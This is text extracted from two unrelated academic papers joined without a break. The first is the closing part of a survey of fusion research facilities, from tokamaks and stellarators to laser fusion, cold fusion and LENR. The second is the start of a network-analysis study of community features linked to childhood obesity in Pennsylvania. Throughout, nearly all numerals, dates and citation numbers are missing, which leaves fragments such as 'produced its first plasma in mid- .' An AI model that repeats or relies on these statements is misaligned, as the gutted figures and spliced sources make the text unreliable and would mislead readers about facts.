and engineering systems. further enhancements are planned at jet with a view to exceeding its fusion power record in future d-t experiments. a compact device – mega amp spherical tokamak (mast) – is also being developed alongside jet, partly to serve the iter project. x. kstar the kstar (korean superconducting tokamak reactor) at the national fusion research institute (nfri) in daejeon produced its first plasma in mid- . it is a pilot device for iter, and involves much international collaboration. it will be a satellite of iter during iter’s operational phase from the early s. the tokamak with . metre major radius is the first to use nb sn superconducting magnets, the same material to be used in the iter project. its first stage of development to was to prove baseline operation technologies and achieved plasma pulses of up to seconds. for the second phase of development ( - ), kstar was upgraded to study long pulses of up to seconds in h mode–the s target was in –and embark upon high-performance at mode. it achieved seconds in high-performance plasma operation in late , a world record. in addition, kstar researchers also succeeded in achieving an alternative advanced plasma operation https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes international journal of advanced network, monitoring and controls volume , no. , mode with the internal transport barrier (itb). this is a steep pressure gradient in the core of the plasmas due to the enhanced core plasma confinement. nfri said this is the first itb operation achieved in the superconducting device at the lowest heating power. kstar phase ( - ) is to develop high performance, high efficiency at mode technologies with long-pulse operation. phase ( - ) will test demo-related prior arts. the device does not have tritium handling capabilities, so will not use d-t fuel. xi. k-demo tokamak in collaboration with the us department of energy's princeton plasma physics laboratory (pppl) in new jersey and south korea’s national fusion research institute (nfri) k-demo is intended to be the next step toward commercial reactors from iter, and would be the first plant to actually contribute power to an electric grid. according to the pppl, it would generate "some billion watts of power for several weeks on end", a much greater output than iter's goal of producing million watts for seconds by the late s. k-demo is expected to have a . m diameter major radius tokamak, and a test blanket module as part of the demo breeding blanket r&d. the ministry of education, science and technology plans to invest about krw trillion (us$ million) in the project. about krw billion of that spending has already been funded. the government expects the project to employ nearly , people in the first phase, which will last throughout . k-demo is expected to have an initial operational phase from about to to develop components for the second stage, which would produce electricity. xii. east in china the experimental advanced superconducting tokamak (east) at china academy of sciences hefei institute of physical science (caships) produced hydrogen plasma at million degrees celsius and held it for seconds in . in november it achieved million degrees celsius for seconds, with input of mw of electric power. a. tftr in the usa, the tokamak fusion test reactor (tftr) operated at the princeton plasma physics laboratory (pppl) from to . d in december , tftr became the first magnetic fusion device to perform extensive experiments with plasmas composed of d-t. the following year tftr produced . mw of controlled fusion power – a record at that time. tftr set other records, including the achievement of a plasma temperature of million degrees centigrade in . however, it did not achieve its goal of break- even fusion energy (where the energy input required is no greater than the amount of fusion energy produced), but achieved all of its hardware design goals, thus making substantial contributions to the development of iter. b. alcator at the massachusetts institute of technology (mit) since the s a succession of small alcator (alto campus torus) high magnetic field torus reactors have operated on the principle of achieving high plasma pressure as the route to long plasma confinement. alcator c-mod is claimed to have the highest magnetic field and highest plasma pressure of any fusion reactor, and is the largest university-based fusion reactor in the world. it operated - . in september it achieved a plasma pressure of . atmospheres at a temperature of million degrees celsius. the plasma produced trillion fusion reactions per second and had a central magnetic field strength of . tesla. it carried . million amps of electrical current and was heated with over mw of power. the reaction occurred in a volume of approximately cubic metre and the plasma lasted for two seconds. having achieved this record performance for a fusion reactor, government funding ceased. a scaled-up version planned to be built at triotsk near moscow in collaboration with the kurchatov institute is ignitor, with . m diameter torus. xiii. large helical device– stellarator the large helical device (lhd) at japan's national institute for fusion science in toki, in the gifu prefecture, was the world's largest stellarator. lhd produced its first plasma in and has demonstrated plasma confinement properties comparable to other large fusion devices. it has achieved an ion temperature of . kev (about million degrees) and plasma stored energy of . million joules (mj). xiv. wendelstein -x stellarator following a year of tests, this started up at the end of , and helium plasma briefly reached about one million degrees centigrade.in it progressed to using hydrogen, and using mw it achieved plasma of million degrees centigrade for a quarter of a second. w -x is the world’s largest stellarator and it is planned to operate continuously for up to minutes. it cost € billion ($ . billion). https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes international journal of advanced network, monitoring and controls volume , no. , xv. heliac- stellarator at the australian plasma fusion research facilityat the australian national university the h- stellarator has run for some years and in was upgraded significantly. h- is capable of accessing a wide range of plasma configurations and allows exploration of ideas for improved magnetic design of the fusion power stations that will follow iter. xvi. nationalignitionfacility– laser the world's most powerful laser fusion facility, the $ billion national ignition facility (nif) at lawrence livermore national laboratory (llnl), was completed in march . using its laser beams, nif is able to deliver more than times the energy of any previous laser system to its target e . llnl announced in july that in "an historic record- breaking laser shot, the nif laser system of beams delivered more than tw of peak power and . megajoules(mj) of ultraviolet laser light to its ( mm diameter) target" for a few trillionths of a second. it was reported that in september at nif for the first time the amount of energy released through the fusion reaction exceeded the amount of energy being absorbed by the fuel, but not the amount supplied by the giant lasers. publication of this in said kj was released. an earlier high-power laser at llnl, nova, was built in for the purpose of achieving ignition. nova failed to do this and was closed in , but provided essential data that led to the design of nif. nova also generated considerable amounts of data on high-density matter physics, which is useful both in fusion power and nuclear weapons research. in connection with nif, llnl is developing the laser inertial fusion engine (life), a hybrid fusion system where neutrons resulting from laser fusion would drive a subcritical nuclear fission blanket to generate electricity. the blanket would contain either depleted uranium; used nuclear fuel; natural uranium or thorium; or plutonium- , minor actinides and fission products from reprocessed used nuclear fuel [ ] . xvii. laser mÉgajoule meanwhile, the french atomic energy commission (commissariat à l'énergieatomique, cea) has operated a similar size laser – the laser mégajoule (lmj) – near bordeaux since . its laser beams are able to generate . mj pulses for a few billionths of a second, concentrated on a small deuterium and tritium target. a prototype laser, the ligned'integration laser (lil), commenced operation in . xviii. sg-ii china’s national laboratory of high-power laser and physics, associated with the china academy of science, has a laser inertial confinement experiment in shanghai – the shenguang-ii eight-beam laser facility (sg-ii), similar to the national ignition facility in the usa and laser mégajoule in france. it is the only high power neodymium-glass solid laser facility with an active probe light in china. in a ninth beam was added, advancing the capacity for fusion research. the sg-ii facility is china’s high-power laser technology international demonstration base. xix. petal and hiper lasers the petawatt aquitaine laser (petal) laser facility is a high energy multi-petawatt laser ( . kj energy with a duration of . to ps) under construction near bordeaux, on the same site as lil. petal will be coupled with lil to demonstrate the physics and laser technology of fast ignition. first experiments are expected in . the high power laser energy research facility (hiper) is being designed to build on the research planned at the petal project. hiper will use a long pulse laser (currently estimated at kj) combined with a kj short pulse laser. a three-year preparatory phase that commenced in has direct funding or in-kind commitments amounting to around € million from several countries. the detailed engineering phase is projected to begin in , with a six-year construction phase possibly commencing by . xx. z machine operated by sandia national laboratories, the z machine is the largest x-ray generator in the world. as with nif, the facility was built as part of the country's stockpile stewardship program, which aims to maintain the stockpile of nuclear weapons without the need for full-scale testing. conditions for fusion are achieved by passing a powerful electrical pulse f (lasting less than nanoseconds) through a set of fine tungsten wires inside a metal hohlraum g . the wires turn into a plasma and experience a compression ('z-pinch'), forcing the vapourized particles to collide with each other, thereby producing intense x-ray radiation. a tiny cylinder containing fusion fuel placed inside the hohlraum would therefore be compressed by the x-rays, allowing fusion to occur. in , z machine had achieved temperatures of over billion degrees [ ] ,considerably higher than what https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references international journal of advanced network, monitoring and controls volume , no. , is needed for fusion, and in theory high enough to allow nuclear fusion of hydrogen with heavier elements such as lithium or boron. xxi. other fusion projects there is a considerable amount of research into many other fusion projects at various stages of development. lockheed cfr. lockheed martin at its so-called ‘skunk works’ is developing a compact fusion reactor(cfr) which uses conventional d-t plasma in evacuated containment but confines it differently. instead of constraining the plasma within tubular rings, a series of superconducting coils will generate a new magnetic-field geometry in which the plasma is held within the broader confines of the entire reaction chamber. the energy is supplied by radiofrequency heating. superconducting magnets within the coils will generate a magnetic field around the outer border of the chamber. the aim is to go to plasma pressure being as great as confining pressure at high enough temperature for ignition and net energy yield. heat exchangers in the reactor wall would convey energy to a gas turbine. it has progressed to a magentised ion confinement experiment, but has some way to go before any prototype, which they claim will be very much smaller than conventional designs such as the iter tokamak. italy's national agency for new technologies, energy and sustainable economic development (enea) is developing a small tokamak reactor by the name of ignitor. under an italian-russian agreement signed in may , a reactor will be assembled in italy and installed at the kurchatov institute's troitsk institute for innovation and fusion research (triniti) near moscow [ ] . an alternative to using powerful lasers for inertial confinement fusion is 'heavy ion fusion', where high- energy particles from an accelerator are focused using magnetic fields onto the fusion target. the ndcx- ii(neutralized drift compression experiment ii) accelerator has been used for heavy ion fusion experiments since at lawrence berkeley national laboratory. it is being expanded to deliver short intense pulses of ion beams with kinetic energy of . mev. high-energy-density physics (hedp) experiments with laboratory plasmas is a growing part of inertial fusion energy (ife) physics. lpp fusion (lawrenceville plasma physics) is a us enterprise developing aleuronic fusion using a dense plasma focus device (dpf or focus fusion) and hydrogen-boron fuel. the hydrogen and boron (b- ) as plasma fuse at high temperature to form a pulsed beam of helium nuclei without emitting neutrons. (the boron and hydrogen combine to produce a brief intermediate carbon- atom which rapidly decays to three alpha particles.) this charged high-energy ion beam generates electricity as it passes through a series of coils similar to a transformer, at % efficiency. the balance of energy is as by-product x-rays which are captured in an array of photoelectric receptors. lpp fusion has achieved electron energies of kev. another line of fusion research using lasers also involves fusing hydrogen and boron- (hb ) to produce helium nuclei, which continue the chain reaction from boron. one laser generates a powerful magnetic confinement field in a coil to trap the fusion reaction in a small area for a nanosecond, while a second more powerful laser triggers the nuclear fusion process. early hb fusion trials at the prague asterix laser system, using high-energy iodine lasers, have generated more energy than needed to trigger the fusion process. the polywell('polyhedron' combined with 'potential well')deviceconsists of magnetic coils arranged in a polyhedral configuration of six sides, forming a cube. a cloud of electrons is confined in the middle of the device so as to be able to accelerate and confine the positive ions to be fused. this electrostatic confinement concept differs from traditional magnetic confinement because the fields do not need to confine ions– only electrons. emc fusion development corporation has been researching the polywell concept and looking at hydrogen and boron as fuel for aneutronic fusion. this followed some years of development by the us navy, using deuterium fuel. general fusionis one of a number of private efforts to develop a commercial fusion power plant. the company’s magnetized target fusion (mtf) approach generates a compact toroid plasma in an injector, containing and compressing it using a magnetic field before injecting it into a spherical compression chamber. the chamber holds a liquid lead-lithium liner which is pumped to create a vortex, into which the plasma target is injected. a synchronized array of pistons firing simultaneously creates a spherical compression wave in the liquid metal, compressing the plasma target and heating it to fusion conditions. founded in canada in , general fusion is funded by a syndicate of private investors, energy venture capital companies, sovereign wealth funds and the canadian government’s sustainable development technology canada (sdtc) fund. a https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references international journal of advanced network, monitoring and controls volume , no. , further government grant was announced in october , from the strategic innovation fund. the company has demonstrated milestones including creating - ev magnetized spheromak plasmas and confining them for over µs. much of current work underway on mtf is derived from programmes at the soviet kurchatov institute of atomic energy, under e. p. velikhov, circa . this inspired the linus project at the naval research laboratory in the usa, and later the fast-liner project at los alamos. tokamak energyin the uk is a private company developing a spherical tokamak, and hopes to commercialize this by . the company grew out of culham laboratory, home to jet, and its technology revolves around high temperature superconducting (hts) magnets, which allow for relatively low-power and small-size devices, but high performance and potentially widespread commercial deployment. its first tokamak with exclusively hts magnets – the st hts, tokamak energy's second reactor – demonstrated hours' continuous plasma during the royal society summer science exhibition in london in , a world record. the next reactor is the st at milton park in oxfordshire, which achieved first plasma in april . it isexpected to produce plasma temperatures of million degrees celsius– hotter than the centre of the sun in after the commissioning of further magnetic coils. "the st is designed to achieve million degrees c and get within a factor of ten of energy break-even conditions. to get even closer to break-even point, the plasma density, temperature and confinement time then need to be fine- tuned.” the company is working with princeton plasma physics laboratory on spherical tokamaks, and with the plasma science and fusion centre at mit on hts magnets. it aims to achieve commercial scale fusion power by . xxii. cold fusion in march , spectacular claims were made for another approach, when two researchers, in the usa (stanley pons) and the uk (martin fleischmann), claimed to have achieved fusion in a simple tabletop apparatus working at room temperature. 'n-fusion', or 'cold fusion', involves the electrolysis of heavy water using palladium electrodes on which deuterium nuclei are said to concentrate at very high densities. the researchers claimed that heat – which could only be explained in terms of nuclear processes – was produced, as well as fusion byproducts, including helium, tritium and neutrons. other experimenters failed to replicate this, however, and most of the scientific community no longer considers it a real phenomenon. xxiii. low-energy nuclear reactions (lenr) initiated by claims for ‘cold fusion’, research at the nanotechnology level is continuing on low-energy nuclear reactions (lenr) which apparently use weak nuclear interactions (rather than strong force as in nuclear fission or fusion) to create low-energy neutrons, followed by neutron capture processes resulting in isotopic change or transmutation, without the emission of strong prompt radiation. lenr experiments involve hydrogen or deuterium permeation through a catalytic layer and reaction with a metal. researchers report that energy is released, though on any reproducible basis, very little more than is input. the main practical example is hydrogen plus nickel powder evidently giving more heat than can be explained on any chemical basis. the japanese government is sponsoring lenr research– notably a nano-metal hydrogen energy project (mhe)– through its new energy and industrial technology development organization (nedo), and mitsubishi is also active in research. xxiv. conclusion the use of fusion power plants could substantially reduce the environmental impacts of increasing world electricity demands since, like nuclear fission power, they would not contribute to acid rain or the greenhouse effect. fusion power could easily satisfy the energy needs associated with continued economic growth, given the ready availability of fuels. there would be no danger of a runaway fusion reaction as this is intrinsically impossible and any malfunction would result in a rapid shutdown of the plant. however, although fusion does not generate long- lived radioactive products and the unburned gases can be treated on site, there would a short- to medium-term radioactive waste problem due to activation of the structural materials. some component materials will become radioactive during the lifetime of a reactor, due to bombardment with high-energy neutrons, and will eventually become radioactive waste. the volume of such waste would be similar to the corresponding volumes from fission reactors. however, the long-term radiotoxicity of the fusion wastes would be considerably lower than that from actinides in used fission fuel, and the activation product wastes would be international journal of advanced network, monitoring and controls volume , no. , handled in much the same way as those from fission reactors with some years of operation. [ ] . there are also other concerns, principally regarding the possible release of tritium into the environment. it is radioactive and very difficult to contain since it can penetrate concrete, rubber and some grades of steel. as an isotope of hydrogen, it is easily incorporated into water, making the water itself weakly radioactive. with a half-life of about . years, the presence of tritium remains a threat to health for about years after it is created, as a gas or in water, if at high levels. it can be inhaled, absorbed through the skin or ingested. inhaled tritium spreads throughout the soft tissues and tritiated water mixes quickly with all the water in the body. although there is only a small inventory of tritium in a fusion reactor – a few grams – each could conceivably release significant quantities of tritium during operation through routine leaks, assuming the best containment systems. an accident could release even more. this is one reason why long-term hopes are for the deuterium-deuterium fusion process, dispensing with tritium. while fusion power clearly has much to offer when the technology is eventually developed, the problems associated with it also need to be addressed if it is to become a widely used future energy source. references [ ] fusion research: an energy option for europe's future, directorate- general for research, european commission, (isbn: ) [ ] statement by dr. raymond l. orbach, under secretary for science and director, office of science, us department of energy ( may ) [ ] national ignition facility achieves unprecedented megajoule laser shot, lawrence livermore national laboratory news release ( january ) [ ] life: clean energy from nuclear waste page on lawrence livermore national laboratory website (www.llnl.gov) [ ] z produces fusion neutrons, sandia scientists confirm, sandia national laboratories news release ( april ) [ ] sandia’s z machine exceeds two billion degrees kelvin, sandia national laboratories news release ( march ) [ ] new project aims for fusion ignition, massachusetts institute of technology news ( may ) new record for fusion, mit news ( october ) [ ] safety and environmental impact of fusion, i. cook, g. marbach, l. di pace, c. girard, n. p. taylor, eur ( ) cce-fu / ftc / (april ) https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references http://web.mit.edu/newsoffice/ /fusion-ignition- .html © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections (insna) issue | vol. article | doi: . /connections- - a network approach to understanding obesogenic environments for children in pennsylvania abstract network methods have been applied to obesity to map connections between obesity-related genes, model biological feedback mecha- nisms and potential interventions, and to understand the spread of obesity through social networks. however, network methods have not been applied to understanding the obesogenic environment. here, we created a network of features of communities hypothesized to be related to obesity. data from an existing study of determinants of obesity among , communities in pennsylvania were used. spearman correlation coefficients were used to describe the bivariate association between each pair of features. these correlations were used to create a network in which the nodes are community features and weighted edges are the strength of the correlations among those nodes. modules of clustered features were identified using the walktrap method. this network was plotted, and then examined separately for communities stratified by quartiles of child obesity prevalence. we also examined the relationship between measures of network centrality and child obesity prevalence. the overall structure of the network suggests that environmental features geographically co-occur, and features of the environment that were more highly correlated with body mass index were more central to the network. three clusters were identified: a crime-related cluster, a food- environment and land use-related cluster, and a physical activity- related cluster. the structure of connections between features of the environment differed between communities with the highest and lowest burden of childhood obesity, and a higher degree of average correlation was observed in the heaviest communities. network methods may help to explicate the concept of the obesogenic environment, and ultimately to illuminate features of the environment that may serve as levers of community-level intervention. keywords obesity environment networks. networks are everywhere (barabasi, , , , ). however, in public health, network science has only now begun to make signifi- cant in-roads. to date, network science has made contributions in diverse areas of biomedical research including cellular communication in cancer (stites et al., ; berger et al., ; gill et al., ; mutation consequences and pathway analysis working group of the international cancer genome consortium, ), protein–protein interactions (jeong et al., ), and complex disease interactions (barabasi, ; goh et al., ; hidalgo et al., ; zhou et al., ). common features link these diverse appli- cations, including high dimensional data and emer- emily a. knapp*, usama bilal, bridget t. burke, geoff b. dougherty and thomas a. glass johns hopkins school of public health. n. wolfe street, baltimore, md . *e-mail: eknapp @jhu.edu. this article was edited by eric quintane. a network approach to understanding obesogenic environments for children in pennsylvania gent patterns not easily visible in bivariate space. networks depict relationships among objects in a system, and network methods help identify struc- tures that influence system behavior. obesity is a challenge for traditional public health research because we do not at present have a robust explanation for the temporal and spatial pat- terns of the obesity epidemic (galea et al., ). this has led obesity researchers to seek alternative, systems science-oriented methods and approaches (burke and heiland, ; huang et al., ; finegood, ). network science has made impor- tant contributions in obesity research along sever- al dimensions. first, network methods have been used to identify complex linkages among obesity- related genes in animal models (chen and zhang, ). second, researchers have conceptualized the ‘stress-response network’ to understand how feed- back within biological systems leads to exacerbation and habituation that results in obesogenic growth (dallman et al., , ). network approaches have been used to study interactions among or- ganizations and components of obesity interven- tions (leroux et al., ; marks et al., ), and applied to causal loop diagrams to identify lever- age points for intervention (mcglashan et al., ). several studies have focused on how obesity and physical activity spread through populations like in- fection (crandall, ; christakis and fowler, ; blanchflower et al., ; hammond, ; hill et al., ; ali et al., ; el-sayed et al., ; gesell et al., ; simpkins et al., ; hammond and ornstein, ). others have examined how obesity impacts social relationships (brewis et al., ; de la haye et al., ; ali et al., ). despite these advances, most network studies in obesity have focused on the structure of linkages between individuals connected through social ties. we are aware of no studies to date that focus on the struc- ture of linkages between features of the environ- ment, thought to be the main drivers of the obesity epidemic. the concept of the ‘obesogenic environment’ was first proposed in the s as a model for eval- uating the contribution of environmental factors to obesity (hill and peters, ; swinburn et al., ). the obesogenic environment assumes a pattern of spatially co-occurring features that jointly influence obesity risk. there is little doubt that aspects of the food and physical activity environment are important, but the question of how to identify patterns of fea- tures within the obesity environment remains unan- swered. tools to examine the connections between features of the obesogenic environment are needed. network analysis can be used to describe relation- ships (edges) between objects (nodes), allowing for the characterization of network-level features that are otherwise hidden. network methods also allow us to visualize these connections, facilitating understanding of a very complex epidemic and potentially prioritizing areas for intervention. in this study, we characterize the obesogenic environment with community features as nodes, and correlations between those features as edges. a version of this methodology has been used in neurologic and genetic research and is commonly referred to as ‘weighted correlation network analysis’ (fox et al., ; zhang and horvath, ). our approach examines the structure of the relationships among multiple community features, instead of ex- amining each community feature as an independent cause of obesity. the literature demonstrates a strong relationship between environmental features that impact diet and physical activity. however, existing studies have focused on single obesity-related features in isolation, most often evaluated for their linear associations with obesity. there has been scant attention to the inter- dependence of these environmental features and how relationships between obesogenic features of the environment are structured and may create qual- itatively different risk environments for obesity. we draw from network analysis tools to study these in- terrelations between features of the environment and explore how they relate to spatial patterns of obesity prevalence. we are guided by the view that transpor- tation systems, cultural variation, markets, and other system dynamics create clusters of obesity-related features that may have synergistic and aggregative effects on population behavior. market forces lead to clusters of restaurants, stores and activity spaces in the built environment (hidalgo and castañer, ). this clustering may potentiate the effect of any one facility by increasing the joint effect of a built and social environment designed to deliver excess calo- ries with maximal efficiency. therefore, the cluster- ing of features and the existence of central bridging nodes that link disparate clusters may point toward novel targets for research and intervention. our primary aim is to explore the utility of net- work analysis methods to characterize the linkages among a set of spatially patterned features of the obesogenic environment. we created a weighted network of community features from , commu- nities in pennsylvania, and examined the relationship between centrality and clustering measures and a commonly used metric of childhood overweight and connections (insna) obesity (percentage of children with body mass index (bmi) percentile ≥ th). methods our goal was to model the network of hypothesized obesity-related features of local environments to better understand how network and node centrality and clustering provide insights about the role of environments in child and adolescent obesity. data our study was based on data from a study of children from , communities in central and northeastern pennsylvania served by geisinger health system. from the system’s electronic medical records system (emr), we previously received data on all patients between and years old who visited a geisinger primary care physician from to . the sample included , children and , visits. the sample is representative of the youth population in the region (schwartz et al., ). this study was approved by institutional review boards at geisinger health sys- tem and johns hopkins school of public health. children were previously assigned to one of , communities based on their geocoded home address. communities consisted of census tracts within cities, and minor civil divisions (townships and boroughs) outside of cities (schwartz et al., ). from the geisinger emr we obtained longitudinal height and weight measurements for children. implausible bmi values, defined as five standard deviations above and below the median, were assumed to be mismeas- urement or data entry errors and were deleted using the standard cdc sas program (schwartz et al., ). we calculated z-scores for individual bmi, esti- mated community-level mean bmi z-score, and per- cent of children who are overweight or obese (bmi greater than or equal to the th percentile for age and sex). we then categorized communities accord- ing to quartiles of the percent of children with bmi at or above the th percentile. to characterize obesity-related features of the environment we assembled a corpus of variables hypothesized to be related to obesity based on exist- ing research. these variables include demographic, economic, and geographic information from publicly available datasets, including those published by the u.s. census, the federal bureau of investigation, and two commercial data vendors, infousa and dun & bradstreet, that provided registries of commercial food and physical activity establishments categorized using standard industry codes. table describes the community features we studied. this list was selected based on attributes that are well accepted in the literature, have acceptable measurement properties, and span a range of content domains and relations with some being related to physical activity and some related to diet. this set of variables has been used in our previous research to characterize diverse aspects of the obesity-related environment in communities (nau et al., ). we categorized all variables in quintile or quartile rank scores to preserve the rank position of variables that are often poorly distributed. after reviewing variable distributions and spearman, pearson, and phi correlation matrices, we chose spearman correlations as the best representation of variable distributions and the strength of connections. network methods given the complex nature of obesogenic environments, we looked for a way to best characterize the relation- ships between all community features. we needed to honor both the pairwise (bivariate) correlations be- tween variables and the structures that emerge from these pairwise correlations. we used a method analo- gous to weighted correlation network analysis (zhang and horvath, ). we generated a data array of co- variates ( obesity-related community features) that we treat as nodes in a network of interconnected en- vironmental attributes. edges were operationalized as the strength of the bivariate correlation between each pair of attributes. bivariate correlations were estimat- ed using pairwise spearman correlation coefficients between the community variables. because we were primarily interested in the strength of linkages among nodes and there is controversy over the direction of the relationships between some of these variables and obesity, we chose to use the absolute value of the correlation between variables. all pairwise correlations were then con- verted to a weighted undirected adjacency matrix where each cell was the correlation between any two variables. we created a weighted graph from this adjacency matrix using the r package igraph (version . . ) (csardi and nepusz, ), specifying pairwise correlations as the edge weights. from this graph, we obtained five sets of results. first, we plotted an overall network graph using all , communities. the coordinates of each node were computed using a force-based algorithm, the fruchterman-reingold algorithm (fruchterman and reingold, ), where the attraction between nodes is a network approach to understanding obesogenic environments for children in pennsylvania proportional to the strength of the correlation between environmental features (nodes). we implemented the version of the algorithm in the r package qgraph (version . . ) (epskamp et al., ). the second set of results represents the same graph stratified by community obesity burden (quartiles). for ease of interpretation we show plots corresponding to quartile and (the thinnest and heaviest communities, respectively (see fig. (overall network) and fig. (stratified network)). table . obesity-related community features included in network analysis. variable identifier feature c- violent crime per , population c- crimes against person per , pop c- crimes against property per , pop f- grocery stores and supermarkets per square mile f- gas stations and convenience stores per square mile f- snack stores (donuts, pretzels, ice cream) per square mile f- all food establishments per square mile f- fast food chain restaurants, count f- all retail food establishments per square mile f- all food service establishments per square mile f- diversity of food establishments in categories f- limited service restaurants per capita f- full service restaurants per capita f- bars and taverns per capita f- health food and gourmet stores per capita f- fruit and vegetable stores and stalls per sqare mile f- discount stores per square mile l- average block length l- household density l- road intersection density l- road segment length diversity p- diversity of physical activity establishments in categories p- indoor recreational centers per square mile p- outdoor recreational centers per square mile p- public outdoor parks and recreational spaces per street mile p- all physical activity establishments per square mile p- indoor fitness and recreational facilities per street miles p- outdoor fitness & recreational facilities per capita p- indoor recreational clubs and organizations per square mile p- outdoor recreational clubs and organizations per square mile t- vehicle miles traveled on main roads (total) t- vehicle miles traveled on main roads per capita notes: data are from combined info usa and d&b databases, ; the federal bureau of investigation uniform crime reporting system; u.s. census ; and pennsylvania state government. connections (insna) third, in order to better understand the relation- ships between the components of the obesogenic environment, we sought to obtain a measure of clus- tering and community structure that allowed us to evaluate if network structure was different across communities classified by prevalence of childhood obesity. we conducted a module detection analysis using the walktrap method (pons and latapy, ) that performs a series of ‘random walks’ between nodes. the probability of ‘walking’ from one node to the next is proportional to the weight of the edge between the nodes, meaning that a walk is more likely to occur between two highly correlated nodes. each node is restricted to membership in one module. this creates modules of variables that are highly connected to each other. we then calculated the normalized network modularity score (newman, ), which quantifies the strength of the connections within and between modules. a higher modularity score indi- cates a network with high within-module connectivity and low between-module connectivity. we calculated the modularity score for the overall network graph and each of the four graphs based on community strata of burden of childhood obesity (see table ). we used the pairwise correlation between variables (nodes) as a weight in the computation of modularity. fourth, we calculated an overall measure of network centrality by calculating the average network degree (barrat et al., ). in a weighted undirected net- work like ours, average network degree is the mean of all pairwise correlations (barrat et al., ). a high average network degree represents a network that has an overall tighter correlation between all nodes. we calculated average network degree for the overall network graph and each of the four network graphs based on obesity prevalence (see table ). fifth, we examined the association between the centrality of a node and its correlation with the prevalence of childhood obesity. for this, we plot- ted the degree centrality of each node against that node’s correlation with the prevalence of childhood obesity (fig. ). figure : network graph for , communities in pennsylvania. this shows a graph of the network of connections between attributes of communities in , communities in pennsylvania. each node in the network represents one feature of the communities, and the edges in the network are absolute values of spearman correlation coefficients. the bivariate correlation between each variable and average body mass index (bmi) z-score is shown by the shading of each node, with darker colors representing stronger absolute correlation with average community bmi z-score. the strength of absolute correlation between two nodes is represented by the darkness and thickness of the lines connecting the variables. a thick, dark line may represent either a strong positive or a strong negative correlation. modules of highly connected variables were created using the walktrap method. a network approach to understanding obesogenic environments for children in pennsylvania results the purpose of this analysis was to apply network methodology to characterize patterns of linkages and interactions among obesity-related environ- mental features among communities in penn- sylvania. figure is a graph of the network of connections (pairwise correlations) between nodes (obesity-related features) in , pennsylvania communities. figure : network graphs for communities in pennsylvania, by quartile of percent of children at or above the th percentile of bmiz. in communities in the lowest quartile of percent of children who are overweight or obese (a: left), community features appear to be less tightly clustered, i.e., co-occur less often, than in communities in the highest quartile of community bmiz (b: right). table . network modularity and average network degree in the overall network and by quartile of prevalence of childhood obesity. quartiles of prevalence of childhood obesity quartile quartile quartile quartile overall network network modularity . . . . . average network degree . . . . . note: quartile represents communities with the lowest prevalence of child overweight and obesity, and quartile represents communities with the highest prevalence of child overweight and obesity. higher modularity indicates a network with high within-module connectivity and low between-module connectivity. average network degree is the mean of all pairwise correlations. connections (insna) the graph illustrates three important network char- acteristics. first, three clusters of tightly-connected variables were identified using the walktrap method. a cluster of the three crime-related variables (rates per , persons of crimes against property, crimes against persons, and all part i offenses) can be seen (green shading), and is weakly linked to the main net- work. this suggests that communities with high rates of violent crime (i.e., assault) also have high rates of crime against property (i.e., arson). crime rates appear to be moderately correlated with obesity rates as indi- cated by the dark color of the crime-related nodes. a second cluster is identified consisting of features rep- resenting land use patterns, transportation, and food establishment density (yellow shading). we believe this represents the spatial clustering that occurs in the context of suburban sprawl with co-location of establishments in high-volume transportation corridors. the nodes at the heart of this cluster in- clude household density (per square mile) and all food establishments per square mile. this second cluster appears to be the tightest. eleven of the nodes have an above average absolute correlation with obe- sity. the model identified a third cluster (pale blue shading) consisting mostly of features that describe the physical activity environment. these include diver- sity of physical activity establishments, outdoor rec- reational facilities per square mile, snack stores (e.g., donuts, pretzels, ice cream) per square mile, indoor recreation centers per square mile, all physical activity establishments per square mile, indoor fitness and recreational facilities per street mile, and indoor recre- ational clubs and facilities per square mile. in both the second and third clusters, the nodes that are most highly correlated with obesity (indicated by darker node color), are more central in the network overall, as well as within each cluster. not all of the food or physical activity nodes are clustered. at the edge of the graph we see several food or physical activity nodes that are not as tightly coupled (including parks and big box stores). finally, the overall structure of the network suggests that elements of these communities are geographically clustered and are not randomly dis- persed across communities, especially features of the physical, food, and land use environments. next, we were interested in whether the struc- ture of this network of features varied across strata of community obesity burden. figure shows the result of running a similar network model separately by quartile of percent of children at or above the th percentile on bmi-z, a threshold widely considered to be indicative of overweight and obesity burden. among communities in the lowest quartile of obesi- ty prevalence (fig. a), community features appear to be less tightly connected than in communities in the highest quartile of obesity prevalence (fig. b). this is also described by the higher modularity in table . for example, among lower obesity prevalence communities, crime is weakly linked to the land use- food- physical activity cluster; but in higher obesity prevalence communities, crime is more tightly linked to this cluster. it is not just that quantities of these fea- tures are larger in heavier communities, but that the connections between features are also altered: com- munities that give rise to higher rates of childhood obesity are structured differently than those with less child obesity. figure : association of degree centrality of each community feature with prevalence of overweight and obesity among children. correlation between community features and body mass index is stronger for more central variables of the obesity-related network features (r = . ). a network approach to understanding obesogenic environments for children in pennsylvania table shows the results of the network structure analysis, overall, and stratified by quartile of obesity. the overall network has a positive modularity of . , indicating that the nodes (environmental features) show a degree of clustering (as compared to a ran- dom distribution of nodes with no clustering). in the analysis stratified by prevalence of childhood obesi- ty, communities in the st and nd quartile (thinnest communities) show a higher modularity compared to communities in the rd and th quartile (heaviest communities) (modularity of . and . vs. . and . , respectively). this means that the modules of variables in thinner communities are either more clustered within each module or have weaker con- nections to variables in other modules, and that in the heaviest communities variables (nodes) exhibit a lower degree of clustering in modules (as can be seen in fig. ). for example, a comparison of the two panels in figure demonstrates that the crime-related cluster shown in green has fewer strong ties (shown by darker lines) to the center of the network in the thinner communities on the left panel compared to the heavier communities in the right panel. similarly, the average network degree is higher in the heaviest communities (degree = . ) compared with the thinnest communities (degree = . ), representing higher average correlation (i.e., stronger connections), between variables in communities with higher preva- lence of childhood obesity. figure shows the relationship between the degree centrality of each community feature (node) with the bivariate correlation of that feature with child- hood overweight and obesity prevalence (percent of kids above the th bmi percentile). each dot represents one of 